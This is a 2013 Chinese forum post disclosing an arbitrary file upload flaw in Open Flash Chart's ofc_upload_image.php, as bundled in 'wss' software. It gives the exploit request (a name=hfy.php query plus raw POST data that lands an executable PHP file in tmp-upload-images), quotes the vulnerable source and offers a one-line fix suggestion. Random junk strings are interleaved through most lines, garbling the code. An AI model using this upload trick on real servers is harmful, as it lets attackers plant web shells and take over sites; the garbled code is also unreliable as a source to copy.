POST 数据漏洞文件执行任意后缀文件保存) o; C$ p- W- A/ v! [
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
( R; \+ l. i+ w# p, H P* i1 b% ]7 \8 y4 D+ S) o# N. W, V$ Q( k
利用:
l' b. n9 R8 \8 M1 M/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
6 C1 R0 u I$ q$ `2 q/ O' w
0 V2 @5 `) L0 Y- JPost任意数据7 Y1 q- ]9 r$ I$ x* M9 `/ P: N
保存位置http://localhost/chart/tmp-upload-images/hfy.php
7 ^# z2 \/ ]8 V4 ~1 B" s0 ] T
; C5 m+ k( I3 W# J. J* N9 t
& l/ y7 L& h6 _+ |; P& R最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
& u+ a0 g: |- V) J5 c+ z) s V8 C5 ^- U
<?php4 M y# I Z& M# y5 z7 E) k7 |
/ a$ o# I U' Y- e5 H
//
0 h: `# W% R7 S// In Open Flash Chart -> save_image debug mode, you8 K3 k6 \5 r) |$ @0 m
// will see the 'echo' text in a new window.
: `$ i- d; y$ Z @//
6 I; y7 i) u; h- R! @, `
' J, v4 C& t% ]) }2 r; M& @/*' J8 _1 u8 ]3 v% D8 ]
1 ~, v! ?# b/ Q F* wprint_r( $_GET );
* l/ d' S. r* C5 aprint_r( $_POST );; O5 |4 |3 ~7 f- @2 h+ ~% C
print_r( $_FILES );3 y+ Y% f- r3 D) _9 X
1 l& t/ r9 p" N. d- ~print_r( $GLOBALS );* r( t+ G& H) S. Q5 s; D
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );% i% F) P; x4 g w. R% [8 @, R
/ r+ a( D q0 |; ^* F
*/
) |8 u5 r1 Q5 P/ z6 C x* M1 Z8 F// default path for the image to be stored //
' T# U& S, l' @( \ i$default_path = '../tmp-upload-images/';
9 b l8 t9 ~" B
$ P1 k9 b& A" z. _! @5 yif (!file_exists($default_path)) mkdir($default_path, 0777, true);
5 z$ c: B4 a1 r% a0 B5 Y0 V! b, i
& I9 Q% P! V: o# M( q) c// full path to the saved image including filename //
d* e" @( x V1 @$destination = $default_path . basename( $_GET[ 'name' ] );
$ P4 R7 s' q4 _0 F
/ e0 y( v( c C" }( }$ s, wecho 'Saving your image to: '. $destination;2 O! e4 p, c9 n/ O, k6 a
// print_r( $_POST );- f4 |5 D5 a! v. A# h+ K/ l
// print_r( $_SERVER );
% x% i, P. h; p6 `5 U// echo $HTTP_RAW_POST_DATA;1 B% a+ w& N! w
; t& y, S' r; ]. y% ~$ T/ ~; d
//
m0 N o- p; U// POST data is usually string data, but we are passing a RAW .png3 D4 E& F( S1 H ], O! R$ M
// so PHP is a bit confused and $_POST is empty. But it has saved
W( ]2 S0 ~ K// the raw bits into $HTTP_RAW_POST_DATA/ t7 w* D) J2 {- p& Y% E
//
: m" n$ s2 l) }5 J8 [6 z3 S) y. o1 ^% w: U. Y' K8 ^
$jfh = fopen($destination, 'w') or die("can't open file"); F% q, l% z% G; t; h, M
fwrite($jfh, $HTTP_RAW_POST_DATA);
6 |. s% G- F3 P; E1 f8 Gfclose($jfh);
" _( p5 l6 w5 h7 d5 Y
: [6 p* q. N6 r, f% t* s, o4 b$ B//
8 K* _$ f& v7 i v1 |! o// LOOK:# A7 D* w: J% b
//+ p5 M* c4 z7 ~, g: ]" k2 ^
exit();
' Y' r9 e2 ~4 H( O//& Y8 R$ C4 h. x: S
// PHP5:4 E( W! ?4 |; O. C. g" B
//
4 }! A2 n7 q& o O9 U% ]+ \0 r1 V
! I2 R/ D$ A4 h3 f( K
8 n! K" s2 i$ M8 W; _// default path for the image to be stored //
% u; G4 l3 J/ V, Q( y$default_path = 'tmp-upload-images/';
' t! b3 B: p: [1 p3 ` b. w" e$ i& N D6 |+ M9 {0 b+ k- {
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
0 g$ T' V6 h( V, {# u6 u. | n3 b
$ Z- c1 t- M% |$ W( \/ |// full path to the saved image including filename //" ~; u" ?! C& `, k- @
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
2 t9 H5 b* n, Z; q
+ Y7 a; `( c" b9 f" I0 `2 N2 v// move the image into the specified directory //7 C2 _1 t6 g! o
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {% n. A) R$ d6 k8 {9 f0 [! r
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";8 o z; U! s" W3 {8 N6 F% S0 t% U
} else {6 x7 Q, k3 o2 Y( r
echo "FILE UPLOAD FAILED";. ]- _* `# ~$ v4 e9 ]4 t
}' _$ D5 r& E" Y
) ]5 j. Q1 ?& K' d2 C1 a2 p/ e; e) ^/ t
?>
8 X! N% Y$ `6 s1 Y8 m8 s4 w7 b2 M6 B) o! A
' k, V3 p4 A$ h8 j- n" B
u% ^4 y& h0 Y7 u0 U( L' B1 L
$ O/ F" `5 S# v4 K0 p% |1 f) q0 u( P" O- U9 R0 d: Q
: ^0 z7 `! @' v% v a T
修复方案:
$ f N9 _, M3 L9 z5 B) } L这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 9 U; E, w; M' b% _% p) L6 L
* ?9 @5 A, k1 x
' q4 l# c3 \) e, b0 H( n8 M8 O$ q, U# E# B) q& d. Q( W/ k# P
1 c/ q* [( t9 I: v |
发表于 2013-2-23 12:38:58
收藏
支持
反对